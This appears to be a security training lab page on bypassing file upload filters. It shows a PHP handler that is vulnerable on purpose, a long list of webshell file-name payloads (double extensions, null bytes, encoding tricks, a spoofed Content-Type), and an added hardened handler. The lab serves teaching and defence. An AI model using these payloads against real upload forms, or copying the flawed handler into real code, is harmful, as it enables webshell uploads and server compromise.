Lab 2: File Upload with Filter Bypass

File upload with security filters that can be bypassed

Difficulty: Medium

Lab Overview

This lab demonstrates file upload vulnerabilities where basic security filters are implemented but can be bypassed using various techniques. The application filters file types and MIME types but doesn't prevent all attack vectors.

Objective: Bypass security filters to upload malicious files and achieve server compromise.

Vulnerable Code with Filters
// Vulnerable: Basic filters that can be bypassed
function process_file_upload_with_filters($file) {
    $allowed_extensions = ['jpg', 'jpeg', 'png', 'gif', 'txt', 'pdf'];
    $allowed_mime_types = ['image/jpeg', 'image/png', 'image/gif', 'text/plain'];
    $max_file_size = 5 * 1024 * 1024; // 5MB
    
    // Check file size
    if ($file['size'] > $max_file_size) {
        return false;
    }
    
    // Check extension
    $file_extension = strtolower(pathinfo($file['name'], PATHINFO_EXTENSION));
    if (!in_array($file_extension, $allowed_extensions)) {
        return false;
    }
    
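    // Check MIME type (this value is taken from the client's Content-Type header)
    if (!in_array($file['type'], $allowed_mime_types)) {
        return false;
    }
    
    // Still vulnerable to bypass techniques: the stored name is the client-supplied one
    // (uploads/ is an assumed destination directory)
    $file_path = 'uploads/' . $file['name'];
    return move_uploaded_file($file['tmp_name'], $file_path);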
}
Filtered File Upload
Active Filters

The following are filtered:

  • Extensions: jpg, jpeg, png, gif, txt, pdf, doc, docx
  • MIME Types: image/jpeg, image/png, image/gif, text/plain, application/pdf, application/msword, application/vnd.openxmlformats-officedocument.wordprocessingml.document
  • File Size: Maximum 5MB
Bypass Techniques

Try these bypass methods:

  • webshell.php.jpg - Double extension
  • webshell.php%00.jpg - Null byte injection
  • webshell.php;.jpg - Semicolon bypass
  • webshell.php.jpg - Case variation
Vulnerability Details
  • Type: File Upload with Filter Bypass
  • Severity: High
  • Method: POST
  • Issue: Inadequate security filters
Bypass Techniques
  • Double Extension: Use multiple extensions
  • Null Byte: Inject null bytes
  • Case Variation: Use different cases
  • Special Characters: Use semicolons, spaces
File Upload Filter Bypass Payloads

Use these techniques to bypass security filters:

1. Double Extension Bypass:
    webshell.php.jpg
    webshell.php.png
    webshell.php.gif
    webshell.php.txt
    webshell.php.pdf
2. Null Byte Injection Bypass:
    webshell.php%00.jpg
    webshell.php%00.png
    webshell.php%00.gif
    webshell.php%00.txt
    webshell.php%00.pdf
3. Semicolon Bypass:
    webshell.php;.jpg
    webshell.php;.png
    webshell.php;.gif
    webshell.php;.txt
    webshell.php;.pdf
4. Case Variation Bypass:
    webshell.PHP
    webshell.Php
    webshell.pHp
    webshell.php
    webshell.PHP.JPG
5. Space Bypass:
    webshell.php .jpg
    webshell.php .png
    webshell.php .gif
    webshell.php .txt
    webshell.php .pdf
6. Dot Bypass:
    webshell.php.
    webshell.php...
    webshell.php....jpg
    webshell.php.....png
7. Slash Bypass:
    webshell.php/
    webshell.php//
    webshell.php/../.jpg
    webshell.php/../../.png
8. Backslash Bypass:
    webshell.php\
    webshell.php\\
    webshell.php\..\.jpg
    webshell.php\..\..\.png
9. URL Encoding Bypass:
    webshell.php%2e%6a%70%67
    webshell.php%2e%70%6e%67
    webshell.php%2e%67%69%66
    webshell.php%2e%74%78%74
10. Unicode Bypass:
    webshell.php%u002e%u0070%u006e%u0067
    webshell.php%u002e%u006a%u0070%u0067
    webshell.php%u002e%u0067%u0069%u0066
    webshell.php%u002e%u0074%u0078%u0074
11. MIME Type Bypass:
    # Upload with image MIME type
    Content-Type: image/jpeg
    # But file content is PHP code
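
Hardened counterpart to the vulnerable handler, as an added example that is not part of the original lab: every technique listed above works by manipulating the client-supplied file name or Content-Type, so this version uses neither. UPLOAD_DIR, its path and store_upload_safely() are hypothetical names, and PHP's fileinfo extension is assumed to be enabled.

```php
<?php
// Added example, not the lab's code. UPLOAD_DIR and store_upload_safely() are
// hypothetical names; the directory is assumed to sit outside the web root.
const UPLOAD_DIR = '/var/app-data/uploads';
const MAX_UPLOAD_BYTES = 5 * 1024 * 1024; // same 5MB limit as the lab

// Detected content type => extension assigned by the server, never by the client.
const TYPE_TO_EXTENSION = [
    'image/jpeg' => 'jpg',
    'image/png'  => 'png',
    'image/gif'  => 'gif',
    'text/plain' => 'txt',
];

function store_upload_safely(array $file): ?string
{
    // Accept only a completed upload that PHP itself received.
    if (($file['error'] ?? UPLOAD_ERR_NO_FILE) !== UPLOAD_ERR_OK
        || !is_uploaded_file($file['tmp_name'] ?? '')) {
        return null;
    }
    $size = filesize($file['tmp_name']);
    if ($size === false || $size === 0 || $size > MAX_UPLOAD_BYTES) {
        return null;
    }

    // Derive the type from the file's content. $file['type'] is the request's
    // Content-Type value and is not consulted at all.
    $detected = (new finfo(FILEINFO_MIME_TYPE))->file($file['tmp_name']);
    if (!is_string($detected) || !array_key_exists($detected, TYPE_TO_EXTENSION)) {
        return null;
    }

    // Build the stored name from random bytes plus the mapped extension, so no
    // part of $file['name'] (extra extensions, null bytes, separators, trailing
    // dots, slashes, encoded characters) ever reaches the filesystem.
    $stored = bin2hex(random_bytes(16)) . '.' . TYPE_TO_EXTENSION[$detected];
    $target = UPLOAD_DIR . '/' . $stored;
    if (!move_uploaded_file($file['tmp_name'], $target)) {
        return null;
    }
    chmod($target, 0640); // readable data only, no execute bit

    // Content sniffing can be fooled by a file that starts with valid image
    // bytes, so the safe name and non-executable location are the real control.
    return $stored;
}
```

Serve stored files through a download script that sets Content-Type from the mapped extension and sends X-Content-Type-Options: nosniff, rather than exposing the upload directory directly.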